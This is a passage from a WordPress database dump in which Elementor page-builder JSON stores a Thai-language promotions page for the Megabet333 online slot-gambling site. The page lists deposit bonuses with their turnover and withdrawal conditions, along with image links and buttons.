data-start=\\\"2365\\\" data-end=\\\"2385\\\">\\u0e44\\u0e21\\u0e48\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e0b\\u0e49\\u0e2d\\u0e19\\u0e42\\u0e1b\\u0e23<\\/strong> \\u0e22\\u0e01\\u0e40\\u0e27\\u0e49\\u0e19\\u0e17\\u0e35\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e38\\u0e44\\u0e27\\u0e49<\\/li><li data-start=\\\"2407\\\" data-end=\\\"2499\\\">naijan <strong data-start=\\\"2414\\\" data-end=\\\"2445\\\">\\u0e02\\u0e2d\\u0e2a\\u0e07\\u0e27\\u0e19\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e1b\\u0e23\\u0e31\\u0e1a\\u0e1b\\u0e23\\u0e38\\u0e07\\/\\u0e22\\u0e01\\u0e40\\u0e25\\u0e34\\u0e01<\\/strong> \\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e41\\u0e25\\u0e30\\u0e1b\\u0e0f\\u0e34\\u0e40\\u0e2a\\u0e18\\u0e01\\u0e32\\u0e23\\u0e08\\u0e48\\u0e32\\u0e22\\u0e2b\\u0e32\\u0e01\\u0e15\\u0e23\\u0e27\\u0e08\\u0e1e\\u0e1a\\u0e17\\u0e38\\u0e08\\u0e23\\u0e34\\u0e15\\/\\u0e1c\\u0e34\\u0e14\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(1358,166,'_thumbnail_id','53'),(1361,167,'_elementor_edit_mode','builder'),(1362,167,'_elementor_template_type','wp-page'),(1363,167,'_elementor_version','3.32.5'),(1364,167,'_elementor_pro_version','3.32.3'),(1365,167,'_wp_page_template','default'),(1366,167,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(1367,167,'_elementor_data','[{\"id\":\"d070aea\",\"elType\":\"section\",\"settings\":{\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"10\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"4d6b9b4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"db612d4\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 Megabet333 \\u0e23\\u0e27\\u0e21\\u0e42\\u0e1b\\u0e23\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e1f\\u0e23\\u0e35 100% \\u0e16\\u0e2d\\u0e19\\u0e44\\u0e21\\u0e48\\u0e2d\\u0e31\\u0e49\\u0e19\",\"header_size\":\"h1\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aff2186\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p data-start=\\\"346\\\" data-end=\\\"760\\\">\\u0e16\\u0e49\\u0e32\\u0e1e\\u0e39\\u0e14\\u0e16\\u0e36\\u0e07\\u0e2a\\u0e34\\u0e48\\u0e07\\u0e17\\u0e35\\u0e48\\u0e14\\u0e36\\u0e07\\u0e14\\u0e39\\u0e14\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e02\\u0e49\\u0e32\\u0e21\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e2d\\u0e2d\\u0e19\\u0e44\\u0e25\\u0e19\\u0e4c megabet \\u0e21\\u0e32\\u0e01\\u0e17\\u0e35\\u0e48\\u0e2a\\u0e38\\u0e14\\u0e01\\u0e47\\u0e04\\u0e07\\u0e2b\\u0e19\\u0e35\\u0e44\\u0e21\\u0e48\\u0e1e\\u0e49\\u0e19 \\u201c<strong>\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15<\\/strong>\\u201d \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e15\\u0e31\\u0e27\\u0e0a\\u0e48\\u0e27\\u0e22\\u0e2a\\u0e33\\u0e04\\u0e31\\u0e0d\\u0e17\\u0e35\\u0e48\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e49\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e04\\u0e38\\u0e49\\u0e21\\u0e04\\u0e48\\u0e32\\u0e41\\u0e25\\u0e30\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e44\\u0e1b\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e01\\u0e31\\u0e19 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e1e\\u0e19\\u0e31\\u0e19\\u0e2d\\u0e2d\\u0e19\\u0e44\\u0e25\\u0e19\\u0e4c\\u0e22\\u0e38\\u0e04\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e08\\u0e36\\u0e07\\u0e41\\u0e02\\u0e48\\u0e07\\u0e02\\u0e31\\u0e19\\u0e01\\u0e31\\u0e19\\u0e2d\\u0e2d\\u0e01\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19\\u0e40\\u0e14\\u0e47\\u0e14 \\u0e46 \\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e40\\u0e2d\\u0e32\\u0e43\\u0e08\\u0e19\\u0e31\\u0e01\\u0e40\\u0e14\\u0e34\\u0e21\\u0e1e\\u0e31\\u0e19\\u0e17\\u0e38\\u0e01\\u0e01\\u0e25\\u0e38\\u0e48\\u0e21 \\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e21\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e1b\\u0e23\\u0e30\\u0e08\\u0e33 \\u0e15\\u0e48\\u0e32\\u0e07\\u0e01\\u0e47\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e23\\u0e31\\u0e1a\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e44\\u0e14\\u0e49\\u0e40\\u0e15\\u0e47\\u0e21\\u0e17\\u0e35\\u0e48 \\u0e22\\u0e34\\u0e48\\u0e07\\u0e16\\u0e49\\u0e32\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e21\\u0e35\\u0e42\\u0e1b\\u0e23\\u0e2b\\u0e25\\u0e32\\u0e01\\u0e2b\\u0e25\\u0e32\\u0e22\\u0e41\\u0e25\\u0e30\\u0e41\\u0e08\\u0e01\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e22\\u0e34\\u0e48\\u0e07\\u0e0a\\u0e48\\u0e27\\u0e22\\u0e43\\u0e2b\\u0e49\\u0e01\\u0e32\\u0e23\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e21\\u0e32\\u0e01\\u0e02\\u0e36\\u0e49\\u0e19\\u0e01\\u0e27\\u0e48\\u0e32\\u0e17\\u0e35\\u0e48\\u0e40\\u0e04\\u0e22 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e1e\\u0e19\\u0e31\\u0e19\\u0e2d\\u0e2d\\u0e19\\u0e44\\u0e25\\u0e19\\u0e4c\\u0e43\\u0e19\\u0e1b\\u0e31\\u0e08\\u0e08\\u0e38\\u0e1a\\u0e31\\u0e19\\u0e44\\u0e21\\u0e48\\u0e40\\u0e1e\\u0e35\\u0e22\\u0e07\\u0e41\\u0e15\\u0e48\\u0e43\\u0e2b\\u0e49\\u0e1a\\u0e23\\u0e34\\u0e01\\u0e32\\u0e23\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e08\\u0e32\\u0e01\\u0e04\\u0e48\\u0e32\\u0e22\\u0e0a\\u0e31\\u0e49\\u0e19\\u0e19\\u0e33\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19 \\u0e41\\u0e15\\u0e48\\u0e22\\u0e31\\u0e07\\u0e21\\u0e32\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e17\\u0e35\\u0e48\\u0e04\\u0e23\\u0e2d\\u0e1a\\u0e04\\u0e25\\u0e38\\u0e21\\u0e17\\u0e38\\u0e01\\u0e0a\\u0e48\\u0e27\\u0e07\\u0e40\\u0e27\\u0e25\\u0e32 \\u0e15\\u0e31\\u0e49\\u0e07\\u0e41\\u0e15\\u0e48\\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01 \\u0e1d\\u0e32\\u0e01\\u0e40\\u0e07\\u0e34\\u0e19 \\u0e16\\u0e2d\\u0e19\\u0e40\\u0e07\\u0e34\\u0e19 \\u0e44\\u0e1b\\u0e08\\u0e19\\u0e16\\u0e36\\u0e07\\u0e42\\u0e1b\\u0e23\\u0e04\\u0e37\\u0e19\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e2a\\u0e35\\u0e22 \\u0e0b\\u0e36\\u0e48\\u0e07\\u0e17\\u0e31\\u0e49\\u0e07\\u0e2b\\u0e21\\u0e14\\u0e19\\u0e35\\u0e49\\u0e16\\u0e37\\u0e2d\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e17\\u0e2d\\u0e07\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e17\\u0e38\\u0e19\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e25\\u0e07\\u0e17\\u0e38\\u0e19\\u0e40\\u0e22\\u0e2d\\u0e30 \\u0e41\\u0e16\\u0e21\\u0e22\\u0e31\\u0e07\\u0e0a\\u0e48\\u0e27\\u0e22\\u0e43\\u0e2b\\u0e49\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e44\\u0e14\\u0e49\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e2a\\u0e30\\u0e14\\u0e38\\u0e14<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"36a351d\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"77587d0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#2C2A2AAD\",\"border_border\":\"none\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[{\"id\":\"3b12e8f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/20_get_100_-_Megabet333-Biz.webp\",\"id\":161,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"f1ccc77\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e42\\u0e1b\\u0e23 20 \\u0e23\\u0e31\\u0e1a 100\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"01efd62\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">\\u0e1d\\u0e32\\u0e01 20 \\u2192 \\u0e23\\u0e31\\u0e1a\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21 80 = \\u0e23\\u0e27\\u0e21 100 \\/ \\u0e17\\u0e33\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19 8 \\u0e40\\u0e17\\u0e48\\u0e32 \\/ \\u0e16\\u0e2d\\u0e19\\u0e44\\u0e14\\u0e49\\u0e2a\\u0e39\\u0e07\\u0e2a\\u0e38\\u0e14 200<\\/p><p><span style=\\\"text-decoration: underline;\\\"><strong>\\u0e2a\\u0e23\\u0e38\\u0e1b\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/strong><\\/span><\\/p><ul><li><strong data-start=\\\"996\\\" data-end=\\\"1012\\\">\\u0e01\\u0e32\\u0e23\\u0e17\\u0e33\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19<\\/strong>\\u00a08 \\u0e40\\u0e17\\u0e48\\u0e32 \\u0e02\\u0e2d\\u0e07\\u0e22\\u0e2d\\u0e14\\u0e23\\u0e27\\u0e21<\\/li><li>\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19<\\/li><li>\\u0e2b\\u0e49\\u0e32\\u0e21\\u0e0b\\u0e37\\u0e49\\u0e2d\\u0e1f\\u0e23\\u0e35\\u0e2a\\u0e1b\\u0e34\\u0e19<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"4f359e1\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e04\\u0e25\\u0e34\\u0e01\\u0e40\\u0e25\\u0e22\",\"selected_icon\":{\"value\":\"fas fa-gift\",\"library\":\"fa-solid\"},\"icon_align\":\"row-reverse\",\"icon_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"align\":\"center\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":50,\"color\":\"rgba(0,0,0,0.3)\"},\"button_box_shadow_box_shadow_type\":\"yes\",\"button_box_shadow_box_shadow\":{\"horizontal\":2,\"vertical\":2,\"blur\":10,\"spread\":0,\"color\":\"rgba(247.980859375, 233.42967273878014, 233.42967273878014, 0.5)\"},\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"link\":{\"url\":\"https:\\/\\/mgbline.com\\/\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"e591d78\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#2C2A2AAD\",\"border_border\":\"none\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[{\"id\":\"3e9ff8e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/79_get_200_7turn_-_Megabet333-Biz.webp\",\"id\":157,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"d853dea\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e42\\u0e1b\\u0e23 79 \\u0e23\\u0e31\\u0e1a 200\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"2ea7fc2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">\\u0e1d\\u0e32\\u0e01 79 \\u2192 \\u0e23\\u0e31\\u0e1a\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21 121 = \\u0e23\\u0e27\\u0e21 200 \\/ \\u0e17\\u0e33\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19 7 \\u0e40\\u0e17\\u0e48\\u0e32 \\/ \\u0e16\\u0e2d\\u0e19\\u0e44\\u0e14\\u0e49\\u0e2a\\u0e39\\u0e07\\u0e2a\\u0e38\\u0e14 600<\\/p><p><span style=\\\"text-decoration: underline;\\\"><strong>\\u0e2a\\u0e23\\u0e38\\u0e1b\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/strong><\\/span><\\/p><ul><li data-start=\\\"798\\\" data-end=\\\"837\\\"><strong data-start=\\\"996\\\" data-end=\\\"1012\\\">\\u0e01\\u0e32\\u0e23\\u0e17\\u0e33\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19<\\/strong>\\u00a07 \\u0e40\\u0e17\\u0e48\\u0e32 \\u0e02\\u0e2d\\u0e07\\u0e22\\u0e2d\\u0e14\\u0e23\\u0e27\\u0e21<\\/li><li data-start=\\\"798\\\" data-end=\\\"837\\\">\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19<\\/li><li data-start=\\\"798\\\" data-end=\\\"837\\\">\\u0e2b\\u0e49\\u0e32\\u0e21\\u0e0b\\u0e37\\u0e49\\u0e2d\\u0e1f\\u0e23\\u0e35\\u0e2a\\u0e1b\\u0e34\\u0e19<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"883800f\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e04\\u0e25\\u0e34\\u0e01\\u0e40\\u0e25\\u0e22\",\"selected_icon\":{\"value\":\"fas fa-gift\",\"library\":\"fa-solid\"},\"icon_align\":\"row-reverse\",\"icon_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"align\":\"center\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":50,\"color\":\"rgba(0,0,0,0.3)\"},\"button_box_shadow_box_shadow_type\":\"yes\",\"button_box_shadow_box_shadow\":{\"horizontal\":2,\"vertical\":2,\"blur\":10,\"spread\":0,\"color\":\"rgba(247.980859375, 233.42967273878014, 233.42967273878014, 0.5)\"},\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"link\":{\"url\":\"https:\\/\\/mgbline.com\\/\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"49fe62a\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"fc4dc04\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#2C2A2AAD\",\"border_border\":\"none\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[{\"id\":\"b25769f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/Free_bonus_100_-_Megabet333-Biz.webp\",\"id\":158,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4e0d99f\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e42\\u0e1b\\u0e23\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e21\\u0e1a\\u0e31\\u0e2a 100%\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"20cbe32\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\" data-start=\\\"696\\\" data-end=\\\"740\\\"><strong data-start=\\\"696\\\" data-end=\\\"711\\\">\\u0e04\\u0e38\\u0e49\\u0e21\\u0e2a\\u0e2d\\u0e07\\u0e40\\u0e14\\u0e49\\u0e07<\\/strong> \\u0e40\\u0e15\\u0e34\\u0e21\\u0e40\\u0e17\\u0e48\\u0e32\\u0e44\\u0e23\\u0e23\\u0e31\\u0e1a\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19<\\/p><ul><li data-start=\\\"696\\\" data-end=\\\"740\\\"><strong data-start=\\\"743\\\" data-end=\\\"758\\\">100 \\u0e23\\u0e31\\u0e1a 200<\\/strong><\\/li><li data-start=\\\"696\\\" data-end=\\\"740\\\"><strong data-start=\\\"763\\\" data-end=\\\"780\\\">500 \\u0e23\\u0e31\\u0e1a 1,000<\\/strong><\\/li><\\/ul><p><span style=\\\"text-decoration: underline;\\\"><strong>\\u0e2a\\u0e23\\u0e38\\u0e1b\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/strong><\\/span><\\/p><ul><li data-start=\\\"798\\\" data-end=\\\"837\\\"><strong data-start=\\\"798\\\" data-end=\\\"813\\\">\\u0e17\\u0e33 6 \\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19<\\/strong>, <strong data-start=\\\"815\\\" data-end=\\\"835\\\">\\u0e16\\u0e2d\\u0e19\\u0e2a\\u0e39\\u0e07\\u0e2a\\u0e38\\u0e14 3 \\u0e40\\u0e17\\u0e48\\u0e32<\\/strong><\\/li><li data-start=\\\"798\\\" data-end=\\\"837\\\">\\u0e01\\u0e48\\u0e2d\\u0e19\\u0e16\\u0e2d\\u0e19 <strong data-start=\\\"848\\\" data-end=\\\"886\\\">\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e15\\u0e31\\u0e14\\u0e40\\u0e04\\u0e23\\u0e14\\u0e34\\u0e15\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 (\\u0e2a\\u0e48\\u0e27\\u0e19\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a)<\\/strong> \\u0e2d\\u0e2d\\u0e01\\u0e42\\u0e14\\u0e22\\u0e2d\\u0e31\\u0e15\\u0e42\\u0e19\\u0e21\\u0e31\\u0e15\\u0e34 \\u0e40\\u0e2b\\u0e25\\u0e37\\u0e2d\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e07\\u0e34\\u0e19\\u0e08\\u0e23\\u0e34\\u0e07\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e16\\u0e2d\\u0e19<\\/li><li data-start=\\\"798\\\" data-end=\\\"837\\\">\\u0e08\\u0e33\\u0e01\\u0e31\\u0e14\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c <strong data-start=\\\"945\\\" data-end=\\\"967\\\">1 \\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\/\\u0e27\\u0e31\\u0e19\\/\\u0e1c\\u0e39\\u0e49\\u0e43\\u0e0a\\u0e49<\\/strong><\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"82869dd\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e04\\u0e25\\u0e34\\u0e01\\u0e40\\u0e25\\u0e22\",\"selected_icon\":{\"value\":\"fas fa-gift\",\"library\":\"fa-solid\"},\"icon_align\":\"row-reverse\",\"icon_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"align\":\"center\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":50,\"color\":\"rgba(0,0,0,0.3)\"},\"button_box_shadow_box_shadow_type\":\"yes\",\"button_box_shadow_box_shadow\":{\"horizontal\":2,\"vertical\":2,\"blur\":10,\"spread\":0,\"color\":\"rgba(247.980859375, 233.42967273878014, 233.42967273878014, 0.5)\"},\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"link\":{\"url\":\"https:\\/\\/mgbline.com\\/\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"174fb16\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#2C2A2AAD\",\"border_border\":\"none\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[{\"id\":\"498b0c4\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/HBD_-_Megabet333-Biz.webp\",\"id\":159,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"ae3dca7\",\"elType\":\"widget\",\"settings\":{\"title\":\"Happy Birthday Bonus \",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d7acfa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\" data-start=\\\"1415\\\" data-end=\\\"1466\\\">\\ud83c\\udf81 \\u0e09\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e14\\u0e37\\u0e2d\\u0e19\\u0e40\\u0e01\\u0e34\\u0e14 \\u0e23\\u0e31\\u0e1a\\u0e02\\u0e2d\\u0e07\\u0e02\\u0e27\\u0e31\\u0e0d\\u0e15\\u0e32\\u0e21\\u0e22\\u0e2d\\u0e14\\u0e1d\\u0e32\\u0e01\\u0e2a\\u0e30\\u0e2a\\u0e21\\u0e20\\u0e32\\u0e22\\u0e43\\u0e19\\u0e40\\u0e14\\u0e37\\u0e2d\\u0e19\\u0e19\\u0e31\\u0e49\\u0e19 <br \\/>(\\u0e23\\u0e31\\u0e1a\\u0e44\\u0e14\\u0e49\\u0e15\\u0e25\\u0e2d\\u0e14\\u0e17\\u0e31\\u0e49\\u0e07\\u0e40\\u0e14\\u0e37\\u0e2d\\u0e19\\u0e40\\u0e01\\u0e34\\u0e14)<\\/p><ul><li data-start=\\\"1469\\\" data-end=\\\"1515\\\">\\u0e22\\u0e2d\\u0e14\\u0e1d\\u0e32\\u0e01\\u0e2a\\u0e30\\u0e2a\\u0e21 <strong data-start=\\\"1480\\\" data-end=\\\"1496\\\">3,000 \\u0e02\\u0e36\\u0e49\\u0e19\\u0e44\\u0e1b<\\/strong> \\u2192 <strong data-start=\\\"1499\\\" data-end=\\\"1513\\\">\\u0e23\\u0e31\\u0e1a\\u0e1f\\u0e23\\u0e35 300<\\/strong><\\/li><li data-start=\\\"1469\\\" data-end=\\\"1515\\\">\\u0e22\\u0e2d\\u0e14\\u0e1d\\u0e32\\u0e01\\u0e2a\\u0e30\\u0e2a\\u0e21 <strong data-start=\\\"1529\\\" data-end=\\\"1542\\\">500\\u20132,999<\\/strong> \\u2192 <strong data-start=\\\"1545\\\" 